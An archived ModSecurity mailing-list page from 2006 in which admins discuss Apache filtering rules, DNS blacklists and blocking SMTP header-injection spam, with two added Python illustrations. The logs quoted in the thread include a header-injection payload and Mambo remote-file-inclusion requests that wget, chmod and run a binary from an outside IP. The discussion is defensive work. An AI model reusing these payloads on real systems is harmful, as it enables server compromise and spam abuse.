mod-security-users Mailing List for ModSecurity (Page 537)
From: Tom A. <tan...@oa...> - 2006-02-23 22:07:06

Diego Pellegrino wrote:
> Ok,
>
> I read LocationMatch documentation, but I couldn't find any easy and
> practical way of writing the location. I tried this way:
>
> /pelo/
>
> <LocationMatch /[pP][eE][lL][oO]/>
> secfilter hola
> </LocationMatch>
>
> it works fine but it's not easy to write, anyone know a better way to do
> this?

Try

RewriteRule /pelo/(.*) /pelo/$1 [NC]

or

Alias /PELO /pelo

or

AliasMatch /PELO/(.*) /pelo/$1

or

Redirect permanent /PELO http://mysite/pelo

Check out the mod_rewrite and mod_alias docs.

Tom
From: Diego P. <die...@ho...> - 2006-02-23 21:48:18

Ok,

I read LocationMatch documentation, but I couldn't find any easy and practical way of writing the location. I tried this way:

/pelo/

<LocationMatch /[pP][eE][lL][oO]/>
secfilter hola
</LocationMatch>

it works fine but it's not easy to write, anyone know a better way to do this?

thank you

----- Original Message -----
From: "Ivan Ristic" <iv...@we...>
To: "Diego Pellegrino" <die...@ho...>
Cc: <mod...@li...>
Sent: Thursday, February 23, 2006 4:22 PM
Subject: Re: [mod-security-users] lowercase and uppercase

> Diego Pellegrino wrote:
>> I have the following question
>>
>> I am using mod_security acting as proxy with apache/linux; the web server
>> is running on windows server.
>>
>> if I use directives like
>>
>> <Location /prueba/hola.html>
>> secfilter chau redirect:/pepe.html
>> </Location>
>>
>> when someone connects using
>>
>> http://mysite/prueba/hola.html?chau
>>
>> the filter works fine.
>>
>> but if I make that request:
>>
>> http://mysite/PRUEBA/HOLA.html?chau the filter doesn't work because the
>> uppercase doesn't match the <location> directive.
>>
>> anyone know how to convert requests to lowercase or uppercase in an easy
>> way using mod_rewrite or something else?
>
> Try LocationMatch:
>
> http://httpd.apache.org/docs/2.2/mod/core.html#locationmatch.
>
> Or use multiple ModSecurity rules, chained (once you make them work ;)
>
> --
> Ivan Ristic, Technical Director
> Thinking Stone, http://www.thinkingstone.com
> ModSecurity: Open source Web Application Firewall
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by xPML, a groundbreaking scripting language
> that extends applications into web and mobile media. Attend the live webcast
> and join the prime developer group breaking into this new coding territory!
> http://sel.as-us.falkag.net/sel?cmd=lnk&kid=110944&bid=241720&dat=121642
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
From: BassPlayer <bas...@an...> - 2006-02-23 20:17:48

I'd love to be able to pipe content through dspam!

BP

Ivan Ristic wrote:
> Tom Anderson wrote:
>>
>> If I were running a blog or forum, I might pipe requests through
>> Bogofilter or another statistical filter in order to remove spam.
>
> As a matter of fact, ModSecurity 1.8.x-dev was able to interface
> with external spam checkers. I announced it on the list (I think)
> but since no one used it I removed it prior to 1.9 final.
>
> If there's interest it can go back. However, I certainly don't
> have time to test the effectiveness of that approach.
>
> --
> Ivan Ristic, Technical Director
> Thinking Stone, http://www.thinkingstone.com
> ModSecurity: Open source Web Application Firewall
From: Tom A. <tan...@oa...> - 2006-02-23 20:13:14

Ivan Ristic wrote:
> As a matter of fact, ModSecurity 1.8.x-dev was able to interface
> with external spam checkers. I announced it on the list (I think)
> but since no one used it I removed it prior to 1.9 final.
>
> If there's interest it can go back. However, I certainly don't
> have time to test the effectiveness of that approach.

Sounds interesting and worthwhile. I'm not a candidate for testing it out right now, but maybe Zach Roberts would be interested.

Tom
From: BassPlayer <bas...@an...> - 2006-02-23 20:06:17

http://apachesecurity.net/

Great book
From: Ivan R. <iv...@we...> - 2006-02-23 19:44:40

Jim McCullars wrote:
>
> That has to be added to Apache, right? The documentation page for
> 1.9.2 tells how to do this with apxs, but I don't use DSO. Could the docs
> be updated to tell how to add this module to Apache as a static module?

If someone tells me how it's done :) I've never tried to compile Apache 1.x statically with PCRE.

> There are some caveats as to the ordering of modules in Apache, and this
> is a topic that I have never fully understood.

You can always reorder them at runtime...

--
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall
From: Ivan R. <iv...@we...> - 2006-02-23 19:43:09

Tom Anderson wrote:
>
> If I were running a blog or forum, I might pipe requests through
> Bogofilter or another statistical filter in order to remove spam.

As a matter of fact, ModSecurity 1.8.x-dev was able to interface with external spam checkers. I announced it on the list (I think) but since no one used it I removed it prior to 1.9 final.

If there's interest it can go back. However, I certainly don't have time to test the effectiveness of that approach.

--
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall
From: Ivan R. <iv...@we...> - 2006-02-23 19:21:50

Diego Pellegrino wrote:
> I have the following question
>
> I am using mod_security acting as proxy with apache/linux; the web server
> is running on windows server.
>
> if I use directives like
>
> <Location /prueba/hola.html>
> secfilter chau redirect:/pepe.html
> </Location>
>
> when someone connects using
>
> http://mysite/prueba/hola.html?chau
>
> the filter works fine.
>
> but if I make that request:
>
> http://mysite/PRUEBA/HOLA.html?chau the filter doesn't work because the
> uppercase doesn't match the <location> directive.
>
> anyone know how to convert requests to lowercase or uppercase in an easy
> way using mod_rewrite or something else?

Try LocationMatch:

http://httpd.apache.org/docs/2.2/mod/core.html#locationmatch.

Or use multiple ModSecurity rules, chained (once you make them work ;)

--
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall
From: Ivan R. <iv...@we...> - 2006-02-23 19:18:32
Zach Roberts wrote:
>
> The problem is that the idea of using flatfiles for a blacklist cannot
> possibly be sustained indefinitely as more of this comment spam
> surfaces. Even blocking the robots by IPs will be nearly impossible
> using firewalls or flatfiles as even firewalls will start to slow down
> servers after tens of thousands of IPs are added.
That's a problem because these devices are rule-based and they
need to be processed sequentially.
Some news: the 2.0.0 code in the CVS supports blacklisting on the
Apache level. The IP addresses are stored in a SDBM database and
only one lookup is needed per request to establish whether it is
blacklisted or not.
There is also a new action - "blockip:DURATION". This may not be
very useful at the moment but:
1. 2.0.0 will also add a rating mechanism, similar to that used
by spam filters.
2. I want to enable ModSecurity to keep track of IP, user, session,
and address ratings.
So, for example, if you get too many hits from the same IP address
you can choose to block it for a while.
OK, now back to the original proposal. There are two ways to approach
it:
1. At the moment the database contains only the blacklisted
addresses. It is possible to start caching clean IP addresses.
That would replace one or multiple DNS resolution attempts with
a single lookup.
2. ModSecurity v2.0.0 is also likely to have an API (web-based)
to allow IP addresses to be added and removed from the list.
An external tool could be used to add/remove the IP addresses.
> Blar's mod_access_rbl was one attempt at this but, the results aren't
> cached so it isn't very efficient.
This is v1 above - it's pretty trivial to add to ModSecurity.
> A rule such as..
>
> SecFilterSelective "ARG_url" "^(http|https):/"
> lookup:combined.surbl.org,denyonfail
What would the above lookup? The contents of parameter "url"?
Perhaps it is a better idea to use regex backreferences for
this...
> Even a way of mod_security extracting the domain from the arguement and
> then passing it to the surbl would be even better.
Right, backreferences.
--
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall
From: Diego P. <die...@ho...> - 2006-02-23 19:17:24

I have the following question

I am using mod_security acting as proxy with apache/linux; the web server is running on windows server.

if I use directives like

<Location /prueba/hola.html>
secfilter chau redirect:/pepe.html
</Location>

when someone connects using

http://mysite/prueba/hola.html?chau

the filter works fine.

but if I make that request:

http://mysite/PRUEBA/HOLA.html?chau the filter doesn't work because the uppercase doesn't match the <location> directive.

anyone know how to convert requests to lowercase or uppercase in an easy way using mod_rewrite or something else?

Thank you
From: Ivan R. <iv...@we...> - 2006-02-23 19:03:39

Diego Pellegrino wrote:
> Hi
>
> I tried to make the following rule
>
> SecFilter mariela chain,id:1009,log,redirect:/pepe.html
> SecFilter jose

This works for me in 1.9.2. Which version are you using? There was a bug in 1.9 related to chain. You may be hitting that.

--
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall
From: Diego P. <die...@ho...> - 2006-02-23 18:51:40

Hi

I tried to make the following rule

SecFilter mariela chain,id:1009,log,redirect:/pepe.html
SecFilter jose

but the chain directive has no effect. If I use this filter

SecFilter mariela chain,id:1009,log
SecFilter jose

the chain directive works fine. Why?

Thank you.
From: Jason E. <jed...@ca...> - 2006-02-23 18:36:47

Zach Roberts wrote:
> I know at least a few of us that use mod_security to enhance security
> in a shared webhosting environment have tried to tackle the problem of
> comment spam. The idea of using mod_security rules to block it isn't
> new. See gotroot.com's blacklist.conf for their attempt at it.
>
> The problem is that the idea of using flatfiles for a blacklist cannot
> possibly be sustained indefinitely as more of this comment spam
> surfaces. Even blocking the robots by IPs will be nearly impossible
> using firewalls or flatfiles as even firewalls will start to slow down
> servers after tens of thousands of IPs are added.

I haven't encountered the problem of too many blacklisted IPs yet. For that problem, we may want a non-flat-file option such as Berkeley DB, SQLite or something similar. Even sendmail compiles its aliases file.

The thing I have noticed is that there is no way to reload the file besides restarting Apache. If you don't have firewall access and block IPs using mod_security (which I don't), it would be nice to be able to have the file reloaded periodically, something like checking for an updated file every 5 minutes (configurable).

> The current solutions for blogs such as WordPress involve running a
> PHP script that accesses MySQL for each attempt and then blocking it
> based on certain criteria. While it works for now I would hate to see
> the day when this type of spam is as common as email spam getting ten
> attempts per second while attempting to run PHP and MySQL.

WordPress already does this by using a plugin called Spam Karma.

> In my opinion what is needed is support for dnsbl type blacklists.
> Blar's mod_access_rbl was one attempt at this but, the results aren't
> cached so it isn't very efficient.
>
> A rule such as..
>
> SecFilterSelective "ARG_url" "^(http|https):/"
> lookup:combined.surbl.org,denyonfail
>
> Even a way of mod_security extracting the domain from the argument
> and then passing it to the surbl would be even better.
>
> Another rule might be..
>
> SecFilterSelective REMOTE_ADDR "regex_to_check_valid_ip"
> lookup:sbl-xbl.spamhaus.org,denyonfail
>
> I think you can see where I'm going with this.

DNS lookups can drastically affect the performance of your server. It may take one second or longer to do the first lookup for an IP. The latency is noticeable. I use blacklists, but only on POST requests or after the request has been served. I have a cron job that runs every minute and uses the blacklist utility from http://www.apachesecurity.net to block IPs on the DNS blacklists among other things. The blacklist utility keeps my blocklist from growing too large by expiring the entries.

The other concern is that waiting on a DNS lookup before serving a request leaves you more open to a DoS attack.

It would be nice if mod_security had this, but I would be very careful about implementing it.

Jason Edgecombe
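The lookup Zach sketches above, with the caching Ivan proposes, as an added Python illustration (not code from the thread or from ModSecurity): it forms the DNSBL query name for an IP address (reversed octets, as for sbl-xbl.spamhaus.org) or for the host of a URL argument (as for combined.surbl.org), and caches listed and clean answers alike for a TTL so a repeat visitor costs one resolution rather than one per request. The resolver is injected and the zone data is a constructed stand-in, so nothing is queried; answering "not listed" when a lookup fails is an assumption made here in view of Jason's stalling concern, and keeping the full host name instead of SURBL's registrable domain is a simplification.

```python
import ipaddress
import time
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urlsplit

# A resolver maps a query name to its A record, or None for NXDOMAIN.
# DNSBL convention: an answer in 127.0.0.0/8 means "listed", NXDOMAIN "clean".
# A real wrapper would return None on NXDOMAIN and raise OSError on timeout.
Resolver = Callable[[str], Optional[str]]


def dnsbl_query_name(value: str, zone: str) -> str:
    """Name to resolve: reversed octets for an IPv4 address (IP lists such as
    sbl-xbl.spamhaus.org), the host name itself for a domain list such as
    combined.surbl.org. Simplification: SURBL expects the registrable domain;
    the full host is kept here."""
    try:
        octets = str(ipaddress.IPv4Address(value)).split(".")
        return ".".join(reversed(octets)) + "." + zone
    except ipaddress.AddressValueError:
        return value.strip(".").lower() + "." + zone


def host_of_url_arg(arg_value: str) -> Optional[str]:
    """The 'extract the domain from the argument' step Zach asks for: only an
    absolute http(s) URL yields a host (cf. the rule's ^(http|https):/ check)."""
    parts = urlsplit(arg_value)
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return None
    return parts.hostname.lower()


class CachedDnsbl:
    """Cache answers, listed or clean, for ttl seconds: a repeat visitor or a
    repeated URL costs one DNS round trip instead of one per request."""

    def __init__(self, resolve: Resolver, ttl: float = 3600.0) -> None:
        self._resolve = resolve
        self._ttl = ttl
        self._cache: Dict[str, Tuple[bool, float]] = {}  # name -> (listed, expiry)
        self.resolutions = 0  # real lookups performed (lets us observe the cache)

    def is_listed(self, value: str, zone: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        name = dnsbl_query_name(value, zone)
        cached = self._cache.get(name)
        if cached is not None and cached[1] > now:
            return cached[0]
        self.resolutions += 1
        try:
            answer = self._resolve(name)
        except OSError:
            # Timeout or server failure: answer "not listed" instead of holding
            # the request (assumption: fail open, per the stalling concern above).
            return False
        listed = answer is not None and answer.startswith("127.")
        self._cache[name] = (listed, now + self._ttl)
        return listed


# Constructed stand-in for the DNS zones (no real data, nothing is queried).
FAKE_ZONE_DATA = {
    "2.0.0.127.sbl-xbl.spamhaus.org": "127.0.0.2",
    "spam.example.combined.surbl.org": "127.0.0.8",
}


def fake_resolve(name: str) -> Optional[str]:
    return FAKE_ZONE_DATA.get(name)


if __name__ == "__main__":
    dnsbl = CachedDnsbl(fake_resolve, ttl=60)
    for remote_addr in ("127.0.0.2", "127.0.0.2", "192.0.2.10"):
        print(remote_addr, dnsbl.is_listed(remote_addr, "sbl-xbl.spamhaus.org"))
    host = host_of_url_arg("http://spam.example/offer")
    print(host, dnsbl.is_listed(host, "combined.surbl.org"))
    print("resolutions:", dnsbl.resolutions)  # 3: the repeated address was cached
```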
From: Jim M. <ji...@ww...> - 2006-02-23 17:35:41

On Thu, 23 Feb 2006, Ivan Ristic wrote:
> I think this is because the regex library used by Apache (and thus
> used by ModSecurity) is not very capable - it does not understand "\n".

Oops. Now, here's something kind of funny. I had noticed that sometimes the pattern worked and sometimes it didn't. Looking closer, I finally noticed that the only time it worked was when the last character in the previous line was an "n" (because [[:space:]] matches the newline). D'oh!

> Note that it is possible (and recommended) to compile ModSecurity
> with PCRE (http://www.pcre.org) and thus work with a much better
> regex library (not to mention the performance increase).

That has to be added to Apache, right? The documentation page for 1.9.2 tells how to do this with apxs, but I don't use DSO. Could the docs be updated to tell how to add this module to Apache as a static module? There are some caveats as to the ordering of modules in Apache, and this is a topic that I have never fully understood.

Thanks for the "\x0a" trick - I just hooked one! :-)

Jim McCullars
University of Alabama in Huntsville
From: Ivan R. <iv...@we...> - 2006-02-23 16:38:54

JupiterHost.Net wrote:
> Hello,
>
> Sorry for the newbie post (*again* ;p I meant mod_security not mod_mono
> ...) but I'm finding conflicting data (or no data ;p) about this (I'm
> trying to RTFM and STFW but swimming in a sea of cluelessness)
>
> a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?

mod_security, yes...

> b) Where is each one documented specifically?

In the manual?

http://www.modsecurity.org/documentation/modsecurity-apache-manual-1.9.2.html

> c) What url has the documentation about building it into Apache 1.3.x
> and 2.2.x (static or DSO is fine)

See above.

--
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall
From: JupiterHost.Net <ml...@ju...> - 2006-02-23 16:37:24

JupiterHost.Net wrote:
> Hello,
>
> Sorry for the newbie post (*again* ;p I meant mod_security not mod_mono
> ...) but I'm finding conflicting data (or no data ;p) about this (I'm
> trying to RTFM and STFW but swimming in a sea of cluelessness)
>
> a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?

Er, make that mod_security (sorry for goofing that up ;P)

> b) Where is each one documented specifically?
>
> c) What url has the documentation about building it into Apache 1.3.x
> and 2.2.x (static or DSO is fine)
>
> TIA!
From: JupiterHost.Net <ml...@ju...> - 2006-02-23 16:36:27

Sheesh, I meant mod_security not mod_mono, sorry :) I did a new post reflecting that, apologies

JupiterHost.Net wrote:
> Hello,
>
> Sorry for the newbie post but I'm finding conflicting data (or no data
> ;p) about this (I'm trying to RTFM and STFW but swimming in a sea of
> cluelessness)
>
> a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?
>
> b) Where is each one documented specifically?
>
> c) What url has the documentation about building it into Apache 1.3.x
> and 2.2.x (static or DSO is fine)
>
> TIA!
From: JupiterHost.Net <ml...@ju...> - 2006-02-23 16:34:32

Hello,

Sorry for the newbie post (*again* ;p I meant mod_security not mod_mono ...) but I'm finding conflicting data (or no data ;p) about this (I'm trying to RTFM and STFW but swimming in a sea of cluelessness)

a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?

b) Where is each one documented specifically?

c) What url has the documentation about building it into Apache 1.3.x and 2.2.x (static or DSO is fine)

TIA!
From: Ivan R. <iv...@we...> - 2006-02-23 16:32:59

Jim McCullars wrote:
> I'm running mod_security 1.9.2
> under Apache 1.3.34 and here is the complete config:
>
> ...
>
> SecFilterSelective SCRIPT_FILENAME "formmail\.pl" skip
> SecFilterSelective ARGS_VALUES "\n[[:space:]]*(to|bcc|cc)[[:space:]]*:.*@"
> SecFilterSelective SCRIPT_FILENAME "contactus\.php" "auditlog,pass"
>
> ...
>
> Note that part of the request reads, "%0Abcc%3A+StarlaK8099%40aol.com", so
> why didn't the second rule block the request? Not sure what I'm doing
> wrong here. Thanks...

I think this is because the regex library used by Apache (and thus used by ModSecurity) is not very capable - it does not understand "\n". I tried replacing "\n" with \x0a (this is a ModSecurity extension) and with "[[:cntrl:]]". Both worked.

Note that it is possible (and recommended) to compile ModSecurity with PCRE (http://www.pcre.org) and thus work with a much better regex library (not to mention the performance increase).

--
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall
From: JupiterHost.Net <ml...@ju...> - 2006-02-23 16:32:10

Hello,

Sorry for the newbie post but I'm finding conflicting data (or no data ;p) about this (I'm trying to RTFM and STFW but swimming in a sea of cluelessness)

a) Will mod_mono work on Apache 1.3.x and Apache 2.2.x ?

b) Where is each one documented specifically?

c) What url has the documentation about building it into Apache 1.3.x and 2.2.x (static or DSO is fine)

TIA!
From: BassPlayer <bas...@an...> - 2006-02-23 16:15:24

I use snort and a modified guardian script to intelligently block src addrs that are generating alerts to my protected nets and DMZ. The script will block the src addrs for a user-defined time and send me a mail like:

SID: http://www.snort.org/pub-bin/sigs.cgi?sid=1:3827
Alert: WEB-PHP xmlrpc.php post attempt [Classification: Web Application Attack] [Priority: 1]
Source: 201.58.125.167
Destination: x.x.x.x
Action: Block

This has cut down on the bandwidth use by attacks.
From: Jim M. <ji...@ww...> - 2006-02-23 15:58:27

Hi, I am a semi-new (just over a week) user of mod_security, having
installed it when a bad PHP script on our web server was used to spam
hundreds of AOL users. It's done a fine job of blocking further attempts
to abuse PHP.
The script that the attackers used was called contactus.php and they used
SMTP header injection to do the spam. I noticed that when I first
installed mod_security, it blocked a lot of attempts, but I have seen very
little activity in the audit log since. But the Apache log shows that the
script is still being called. So I decided to log all calls to
contactus.php to see what was happening. I'm running mod_security 1.9.2
under Apache 1.3.34 and here is the complete config:
<ifModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# Unicode encoding check
SecFilterCheckUnicodeEncoding Off
# Only allow bytes from this range
SecFilterForceByteRange 0 255
# Only log suspicious requests
SecAuditEngine RelevantOnly
# The name of the audit log file
SecAuditLog logs/audit_log
# Debug level set to a minimum
SecFilterDebugLog logs/modsec_debug_log
SecFilterDebugLevel 0
# Should mod_security inspect POST payloads
SecFilterScanPOST On
# By default log and deny suspicious requests
# with HTTP status 500
SecFilterDefaultAction "deny,log,status:500"
#
# rules
#
# filter out SMTP injection attempts to exploit badly-written PHP scripts
# skip the check if the script is formmail.pl
SecFilterSelective SCRIPT_FILENAME "formmail\.pl" skip
SecFilterSelective ARGS_VALUES "\n[[:space:]]*(to|bcc|cc)[[:space:]]*:.*@"
SecFilterSelective SCRIPT_FILENAME "contactus\.php" "auditlog,pass"
</IfModule>
I added the third rule this morning to try and log calls to contactus.php
that do not get blocked by the second rule. Here is a log entry:
==00004f90==============================
Request: lib.uah.edu 211.220.247.254 - - [23/Feb/2006:09:49:32 -0600]
"POST /contactus.php HTTP/1.1" 200 16163 "http://lib.uah.edu/" "-" - "-"
----------------------------------------
POST /contactus.php HTTP/1.1
Connection: Keep-Alive, Close
Content-Length: 773
Content-Type: application/x-www-form-urlencoded
Host: lib.uah.edu
Referer: http://lib.uah.edu/
mod_security-message: Warning. Pattern match "contactus\\.php" at
SCRIPT_FILENAME
773
esh_formmail_recipient=where7087%40lib.uah.edu&esh_formmail_cc=th%0D%0AContent-Type%3A+multipart%2Falternative%3B+boundary%3D1bcca4044c1101318a576bbebb0fdef3%0AMIME-Version%3A+1.0%0ASubject%3A+whose+rank+they+can+borrow%0Abcc%3A+StarlaK8099%40aol.com%0A%0AThis+is+a+multi-part+message+in+MIME+format.%0A%0A--1bcca4044c1101318a576bbebb0fdef3%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AContent-Transfer-Encoding%3A+7bit%0A%0Adance+and+she+fell+dead+to+the+earth+uthor+s+ote+n+hiele+s+anish+opular+radition+it+is+related+that+she+was+one+argrethe+kofgaard%0A--1bcca4044c1101318a576bbebb0fdef3--%0A%0D%0A.%0D%0A&formmail_submit=where7087%40lib.uah.edu&esh_formmail_bcc=where7087%40lib.uah.edu&esh_formmail_subject=where7087%40lib.uah.edu
HTTP/1.1 200 OK
X-Powered-By: PHP/4.3.4
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
--00004f90--
Note that part of the request reads, "%0Abcc%3A+StarlaK8099%40aol.com", so
why didn't the second rule block the request? Not sure what I'm doing
wrong here. Thanks...
Jim McCullars
University of Alabama in Huntsville
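The mismatch Jim describes, re-implemented in Python as an added example (not code from the thread or from ModSecurity): the rule's pattern is applied to the decoded ARGS_VALUES of constructed POST bodies in three variants, the "\n" form as the POSIX engine actually read it (an escaped n is a plain n, which is Ivan's diagnosis), the "\x0a" form, and the "[[:cntrl:]]" form. Python's re understands "\n" itself, so the first variant is emulated by writing the pattern with a bare n; the POSIX classes are translated to their Python equivalents, and the field names and addresses are made up.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl

# ModSecurity 1.9's ARGS_VALUES: every decoded value of every form field,
# in the order they appear in the x-www-form-urlencoded body.
def args_values(body: str) -> List[str]:
    return [value for _, value in parse_qsl(body, keep_blank_values=True)]

# The rule from the config, "\n[[:space:]]*(to|bcc|cc)[[:space:]]*:.*@",
# in three variants. POSIX classes translated: [[:space:]] -> \s,
# [[:cntrl:]] -> [\x00-\x1f\x7f].
HEADER_INJECTION_RULES = {
    # What the old POSIX engine made of "\n": an escaped n is a plain n, so
    # the rule only fired when an n happened to precede the newline.
    "posix_literal_n": re.compile(r"n\s*(to|bcc|cc)\s*:.*@"),
    # "\x0a" (ModSecurity extension): a real line feed.
    "x0a": re.compile(r"\x0a\s*(to|bcc|cc)\s*:.*@"),
    # "[[:cntrl:]]": any control character, so CR or LF both count.
    "cntrl": re.compile(r"[\x00-\x1f\x7f]\s*(to|bcc|cc)\s*:.*@"),
}

def matching_rules(body: str) -> Dict[str, bool]:
    """For each rule variant, would any ARGS_VALUES entry have matched?"""
    values = args_values(body)
    return {name: any(rule.search(v) is not None for v in values)
            for name, rule in HEADER_INJECTION_RULES.items()}

# Constructed POST bodies in the shape of the contactus.php audit entry.
CLEAN_BODY = ("esh_formmail_recipient=info%40example.org"
              "&esh_formmail_subject=Question+about+opening+hours"
              "&esh_formmail_cc=")

# Injected bcc: header, preceded by a line ending in "w" (as in the log):
# the literal-n variant misses it, the other two catch it.
INJECTED_BODY = ("esh_formmail_recipient=info%40example.org"
                 "&esh_formmail_cc=th%0D%0AContent-Type%3A+text%2Fplain"
                 "%0ASubject%3A+whose+rank+they+can+borrow"
                 "%0Abcc%3A+victim%40example.net%0A%0Abody")

# Same injection, but the preceding line ends in "n": now even the
# literal-n variant fires (Jim's "D'oh" observation).
INJECTED_BODY_AFTER_N = ("esh_formmail_recipient=info%40example.org"
                         "&esh_formmail_cc=th%0ASubject%3A+see+you+soon"
                         "%0Abcc%3A+victim%40example.net%0A%0Abody")

if __name__ == "__main__":
    for label, body in [("clean", CLEAN_BODY), ("injected", INJECTED_BODY),
                        ("injected after n", INJECTED_BODY_AFTER_N)]:
        print(label, matching_rules(body))
```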
From: <Ral...@it...> - 2006-02-23 15:19:33

Hi Andrej,

thank you for your thoughts.

Luckily the webapps don't run PHP. That's why there isn't even a mod_php or external PHP interpreter present. Also user agents such as wget aren't installed. And I seriously consider removing all of Perl (though no Perl CGIs nor mod_perl code is part of the webapp). Still there seem to be some system tasks that rely on the presence of Perl, but I think on a bastion host nothing more than what is exactly needed for its service should exist there.

What still troubles me is the Java stuff that I will be forced to install, because I know too little of Java to be alerted about security issues and exploits in that field. But weren't it the Java folks who once boasted about their new cool language, that a prominent design feature was its sandboxing? I'll have to educate myself with Java and Tomcat and mod_jk...

> -----Original Message-----
> From: mod...@li... [mailto:mod...@li...] On Behalf Of Andras Got
> Sent: Thursday, February 23, 2006 2:43 PM
> To: mod...@li...
> Subject: Re: [mod-security-users] What best to do with php, xmlrpc, cvs, mambo, blog, drupal, wordpress injection attacks?
>
> Hi,
>
> Just ban wget, fetch and other dl clients, suspicious names in URLs, and of course you should secure
> your PHP (safe_mode, disable_functions, open_basedir).
>
> For xmlrpc you may filter on the post payload, I'm not familiar with that security flaw.
>
> IMHO you should give them a 404 and nothing more. I think the best defense is showing them that
> there's nothing to exploit. When too many of these actions come to your webserver you may DoS the
> system you're redirecting to and giving a new target as well.
>
> You may write letters to the abuse addresses of the network admins, because these are zombie
> machines almost every time. On my webserver I got them coming from 3000-5000 addresses, but they're
> referer spams. I redirect them to localhost (to their localhost) with mod_rewrite. :)
>
> Computer users tend to be very ignorant about security flaws lately, so there's not much we can do,
> besides a 404. :(
>
> Regards,
> Andrej
>
> Ral...@it... wrote:
> > Hello,
> >
> > I guess evil noise like that is a mundane encounter to any WWW webserver admin
> > and probably an unavoidable plague, as is SPAM for SMTP relays.
> >
> > Because I haven't administered a WWW servicing webserver yet
> > I luckily have missed such filth so far.
> >
> > Of course these requests aren't serviced by our webserver and mod_security dutifully
> > sends them a 404,
> > nevertheless they waste bandwidth, file system space for their
> > logging and processing resources.
> >
> > On the other hand I'm hesitant to drop those source IP addresses
> > by my packet filter
> > because I suspect them (if not spoofed) to originate from an
> > ISP's dynamic IP pool,
> > and thereby blocking the next unlucky decent guy who happens to have
> > temporarily been assigned such
> > an abused IP address.
> >
> > So I would like to ask you seasoned webserver admins how best to
> > handle these requests?
> >
> > Do you simply drop them,
> > or do you redirect them to sites e.g. such as
> > http://www.gulli.com/ ,
> > or some CERT blacklist etc.?
> >
> > As for mod_security,
> > what would a neat filter look like to counter or trick them?
> > Is the setup of a honeypot that would draw attention from the
> > webserver advisable,
> > or is such in vain?
> >
> > Here's an excerpt from our access_log of requests trying to wget
> > and run some hostile code
> > through our webserver.
> > As these reappear on a regular basis
> > I assume that some attack kits that generate them are in
> > widespread use.
> >=20 > >=20 > > 203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET > > /index2.php?option=3Dcom_content&do_pdf=3D1&id=3D1index2 > > .php?_REQUEST[option]=3Dcom_content&_REQUEST[Itemid]=3D1&GLOBALS=3D&mos > > Config_absolute_path=3Dhttp://209.123.16 > > .34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.123.16.34/gicumz;chmod%2074 > > 4%20gicumz;./gicumz;echo%20YYY;echo| =20 > > HTTP/1.1" 404 208 > > 203.221.23.212 - - [23/Feb/2006:03:56:55 +0100] "GET > > /index.php?option=3Dcom_content&do_pdf=3D1&id=3D1index2. > > php?_REQUEST[option]=3Dcom_content&_REQUEST[Itemid]=3D1&GLOBALS=3D&mosC > > onfig_absolute_path=3Dhttp://209.123.16. > > 34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744 > > %20gicumz;./gicumz;echo%20YYY;echo| H > > TTP/1.1" 404 207 > > 203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET > > /mambo/index2.php?_REQUEST[option]=3Dcom_content&_RE > > QUEST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.123.1 > > 6.34/cmd.gif?&cmd=3Dcd%20/tmp;wget%20209 > > .123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| > > HTTP/1.1" 404 214 > > 203.221.23.212 - - [23/Feb/2006:03:56:58 +0100] "GET > > /cvs/index2.php?_REQUEST[option]=3Dcom_content&_REQU > > EST[Itemid]=3D1&GLOBALS=3D&mosConfig_absolute_path=3Dhttp://209.123.16. 
> > 34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 212
> > 203.221.23.212 - - [23/Feb/2006:03:56:59 +0100] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 223
> > 203.221.23.212 - - [23/Feb/2006:03:57:01 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 218
> > 203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212
> > 203.221.23.212 - - [23/Feb/2006:03:57:03 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 403 217
